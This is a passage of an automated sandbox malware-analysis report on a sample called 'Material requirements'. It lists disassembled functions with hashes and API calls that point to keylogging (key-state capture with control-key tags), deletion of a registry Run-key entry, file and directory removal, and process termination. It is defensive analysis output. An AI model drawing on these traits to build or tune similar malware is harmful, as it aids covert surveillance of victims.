                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorFreeHeapLast_free
                        • String ID: `@$`@
                        • API String ID: 1353095263-20545824
                        • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                        • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                        • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                        • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                        Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyState.USER32(00000012), ref: 0040ADB5
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: State
                        • String ID: [CtrlL]$[CtrlR]
                        • API String ID: 1649606143-2446555240
                        • Opcode ID: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                        • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                        • Opcode Fuzzy Hash: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                        • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                        Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                        • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                        Strings
                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteOpenValue
                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                        • API String ID: 2654517830-1051519024
                        • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                        • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                        • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                        • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                        Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteDirectoryFileRemove
                        • String ID: pth_unenc
                        • API String ID: 3325800564-4028850238
                        • Opcode ID: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                        • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                        • Opcode Fuzzy Hash: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                        • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                        Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                        • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ObjectProcessSingleTerminateWait
                        • String ID: pth_unenc
                        • API String ID: 1872346434-4028850238
                        • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                        • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                        • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                        • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                        Function 0043FA6E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                        • GetLastError.KERNEL32 ref: 0043FB12
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$ErrorLast
                        • String ID:
                        • API String ID: 1717984340-0
                        • Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                        • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                        • Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                        • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759